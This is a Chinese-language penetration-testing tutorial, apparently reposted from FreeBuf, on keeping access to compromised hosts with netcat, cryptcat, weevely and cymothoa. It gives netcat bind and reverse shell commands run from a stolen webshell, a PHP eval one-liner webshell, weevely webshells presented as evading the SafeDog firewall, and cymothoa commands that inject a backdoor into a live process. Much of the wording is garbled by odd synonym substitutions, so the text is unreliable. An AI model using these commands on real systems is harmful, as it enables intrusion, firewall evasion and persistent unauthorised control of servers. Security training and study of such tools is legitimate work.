外网ip地点 段（外网 ip）〔外网ip地址范围〕

　　维持访问

　　在得到 了目标 体系 的访问权之后 ，攻击者必要 进一步维持这一访问权限。利用 木马程序 、后门程序和rootkit来到达 这一目标 。维持访问是一种艺术情势 ，头脑 比渗出 更加紧张 。

Netcat

Cryptcat

weevely

cymothoa

　　1

　　Netcat

　　NetCat是一个非常简单 的Unix工具，可以读、写TCP或UDP网络毗连 (network connection)。它被计划 成一个可靠的后端(back-end) 工具 ，能被别的 的程序或脚本直接地或轻易 地驱动 。同时，它又是一个功能丰富的网络调试和开辟 工具，由于 它可以创建 你大概 用到的险些 任何范例 的毗连 ，以及一些非常故意 思的内建功 能。NetCat小巧且功能强大 ，可谓是居家观光 出门必备的“瑞士军刀 ”。

　　一样平常 我们利用 netcat做的最多的事变 为以下三种：

　　1、 扫描指定IP端口环境

　　2 、 端口转发数据（重点）

　　3、 提交自界说 数据包

　　实例演示:NC反弹CMDShell

　　常用语法简单 先容

　　#毗连 到某处

　　netcat [-options] hostname port[s] [ports] …

　　#监听端口等待 毗连

　　netcat -l -p port [-options] [hostname] [port]

　　#Options

　　-u UDP 模式

　　-v 表现 具体 信息 [-vv更具体 信息]

　　-w secs 毗连 超时设置

　　-z I/O 模式 [扫描时利用 ]

　　-l 监听入站信息

　　-p port 打开本地 端口

　　-n 以数字情势 表现 的IP地点

　　-t 以TELNET的情势 应答入站哀求

　　-e prog 程序重定向

　　扫描常用

　　【下令 】netcat -v ip port

　　【表明 】扫瞄某 IP 的某个端口，返回端口信息具体 输出 。

　　【下令 】netcat -v -z ip port-port

　　【表明 】扫描某IP的端口段，返回端口信息具体 输出 ，但扫描速率 很慢。

　　【下令 】netcat -v -z -u ip port-port

　　【表明 】扫描某 IP 的某 UDP 端口段，返回端口信息具体 输出，但扫描速率 很慢。

　　【下令 】netcat -nvv -w2 -z ip port-port

　　【表明 】扫锚某IP的端口段 ，毗连 超时时间为2秒。

　　流量处理 惩罚

　　【下令 】netcat -l -p 80

　　【表明 】开启本机的 TCP 80 端口并监听次端口的上传输的数据 。

　　【下令 】netcat -l -v -p 80

　　【表明 】开启本机的 TCP 80 端口并将监听到的信息输出到当前 CMD 窗口。

　　【下令 】netcat -l -p 80 log.dat

　　【表明 】开启本机的 TCP 80 端口并将监听到的信息输出到 log.dat 日记 文件里。

　　【下令 】netcat -nvv 192.168.1.1 80

　　【表明 】毗连 到192.168.1.101主机的 80端口

　　正向毗连

　　【长途 运行】netcat -l -p 1234 -t -e ％windir%\system32\cmd.exe

　　【本地 运行】netcat -nvv 192.168.1.1 1234

　　采取 正向毗连 方式，长途 主机（注：假设IP地点 为 192.168.1.1）上实行 上述下令 即为绑定长途 主机的 CMD 到1234 端口，当本地 主机毗连 长途 主机乐成 时就会返回给本地 主机一个CMD Shell 。

　　反向毗连

　　【本地 运行】netcat -l –vv -p 1234

　　【长途 运行】netcat -t -e ％windir%\system32\cmd.exe 192.168.1.2 1234

　　采取 反向毗连 方式 ，先在本地 主机运行 nc -l –vv -p 1234 开启1234 端口并监听等待 长途 主机毗连 ；在长途 主机上运行 nc -t -e cmd.exe 192.168.1.2 1234 将长途 主机的 CMD 重定向到 IP 地点 为 192.168.1.2(即本机) 端标语 为1234 的主机上，毗连 乐成 后 IP 地点 为 192.168.1.2 的主机遇 得到一个CMDShell。

　　NC反弹CMDShell

　　在Web渗出 中，偶然 间 拿到了webshell ，我们常常 会实行 很多 下令 举行 提权等操纵 ，但当我们要实行 很多 下令 的时间 ，利用 webshell实行 cmd每每 没有本地 实行 方便,Web程序不稳固 ，轻易 瓦解 。因此可以借助Webshell通过NC反弹Cmdshell 。

　　#比方 已经得到一只webshell如图

　　小结

　　简单 看了下，得知：

　　1、操纵 体系 版本为Win NT 6.1.7601，那么要么Win7要么Win Server 2008，既然是服务器 ，后者大概 性更大)

　　2 、目次 访问权限：除了C盘不能访问，D、E、F、H盘都能跨目次 访问，阐明 权限还是 比力 大的 ，别的 很多 文件都具有r/w权限

　　3 、通过多点Ping测试返回结果 ，可以以为 该网站没有利用 CDN加快 ，即能通过域名轻松得到真实IP

　　关于判定 CDN、找出CDN下真实IP的方法 ，我之前整理过，有爱好 的话也答应 以看下这篇文章：绕过CDN查察 真实IP

　　通过以上信息，那么思绪 可以如下：步调 简单 演示

　　1、上传cmd.exe 、nc.exe到D盘根目次 （上传到权限大的目次 ）

　　2、通过NC创建 反弹得到CMDShell（一样平常 选一个看起来“正常”点的端口,奇奇怪 怪的端口防火墙轻易 拦截）

　　【本地 】netcat -l –vv -p 23

　　【Shell上】nc.exe -t -e cmd.exe X.X.X.X 23

　　此中 X.X.X.X为本机公网IP ，实际 测试需确保外网能访问本机，须要 时需端口映射等。

　　【Shell上实行 】nc.exe -t -e cmd.exe X.X.X.X 23

　　【本地 】乐成 得到CMDShell，即在本地 可直接实行 CMD

　　2

　　Cryptcat

　　Netcat隧道加密之Cryptcat ，正所谓菜刀砍狗头，渗出 信猫流，狗和猫常常 是相互的，比如 安全狗。cryptcat与netcat最重要 区别就是 ，通过隧道在传输数据时，它传输的数据颠末 了加密 。

　　Cryptcat是经典网络工具netcat的加密版，利用 twofish算法加密 ，其密钥协商过程基于发送、吸取 双发共享的一个password。Cryptcat用法根本 和NC相近，不外 多先容 了。

　　3

　　weevely

　　weevely是一款利用 python编写的webshell工具（集webshell天生 和毗连 于一身，仅用于安全学习讲授 之用 ，克制 非法用途），可以算作是linux下的一款菜刀更换 工具（限于php） 。利用 weevely天生 的shell免杀本领 很强，并利用 加密毗连 ，每每 能轻松突破防火墙拦截。

　　概要：常用语法简单 先容

　　实例演示：一句话木马突破“安全狗”

　　输入weevely generate可查察 资助

　　#从提示中可以看到

　　毗连 一句话木马： weevely URL password [cmd]

　　加载session文件 weevely session path [cmd]

　　天生 后门署理 weevely generate password path

　　实行 环境 ：

　　OS：Windows Server 2008 R2

　　Server :Apache 2.4

　　Firewall:安全狗(Apache版)V3.1正式版

　　1. 将安全狗的网马库更新到最新后，再举行 通例 扫描，扫描结果 为“未发现网页木马及其他伤害 文件 ” ，即统统 正常

　　2. 手动在网站目次 下任意 添加一句话木马，定名 为test.php，结果 显然会被杀

　　test.php ?php @eval($_POST['c']);?

　　#通过weevely天生 一句话木马

　　weevely generate test /root/Desktop/test.php

　　（#test为暗码 ，/root/Desktop/test.php输出路径）

　　3. 将天生 的木马放到网站根目次 ，更换 原来的test.php

　　4. 将天生 的木马放到网站根目次 ，更换 原来的test.php，并重新扫描

　　5. 通过weevely毗连 一句话木马 ，可直接实行 CMD

　　weevely https://www.xxx.cn/test.php test

　　4

　　cymothoa

　　Cymothoa 是一款可以将 shellcode 注入到现有进程 的（即插进程 ）后门工具。借助这种注入本领 ，它可以或许 把shellcode伪装成通例 程序。它所注入的后门程序应当可以或许 与被注入的程序（进程 ）共存，以克制 被管理和维护职员 猜疑 。将shellcode注入到其他进程 ，尚有 别的 一项上风 ：纵然 目标 体系 的安全防护工具可以或许 监督 可实行 程序的完备 性，只要它不检测内存，那么它就不能发现（插进程 ）后门程序的进程 。

　　很赞的点是注入到的进程 ,只要有权限就行,然后反弹的也就是进程 相应的权限(并不必要 root那样),固然 进程 重启大概 挂了也就没了.固然 动作也是很显着 的。

　　实例演示:利用 Cymothoa注入后门

　　1. 起首 可先查察 程序PID（*nix体系 ps ，windows体系 tasklist)

　　2. 在利用 Cymothoa时，须通过-p 选项指定目标 进程 的PID，并通过-s选项指定Shellcode的编号 。比方 对bash进程 举行 注入。

　　查察 ：

　　cymothoa －S

　　比如 对bash举行 注入

　　cymothoa -p 8150 -s 0 -y 1001

　　3. 注入乐成 后如上图 ，此中 -y 代表开放后门端口

　　4.可以看到注入乐成 后开了rpc。 。

　　写在末了

　　嗯，这几篇文章么，是有个事变 ，刚好必要 这些给一些大一大二的培训 ，然后xx找我整理，以是 就简单 的整理了下，内容么偏简单 ，先容 些工具，根本 也没什么难度，Freebuf这边比力 鼓励新人 ，因此给了个机遇 发了这些文章（这里感谢Freebuf，尤其洋葱哥）文章么老早就交了，写了什么也没忘了 ，以是 前一篇一不警惕 xxx我也真的是没留意 到，到如今 我还是 一脸蒙蔽的….

　　那些在下面喷我的朋侪 们，我能明白 Y(^_^)Y 被喷是功德 ，至少阐明 各人 还是 盼望 Freebuf多出好文的，以后投稿我会留意 的。固然 那些在下面挺我的小搭档 我也非常感谢各人 Y(^_^)Y有个好消息就是这是末了 一篇了，我也不会再写也懒得再写这种东西了，说真的一个月前熬夜写这个也是一脸蒙蔽—＋二脸蒙球的 某云如今 不能舒畅 的玩耍了 ，以后就好幸亏 FB混^ – ^ （别的 ，并没有基友啊，正想找一个^ ^呢 ，求保举 ，一起？？哈哈）

文/sysorem 泉源 /FreeBuf

　　作育 专业的网络安全人才，

　　成绩 良好 的安全“大牛“

　　QQ交换 群：204528261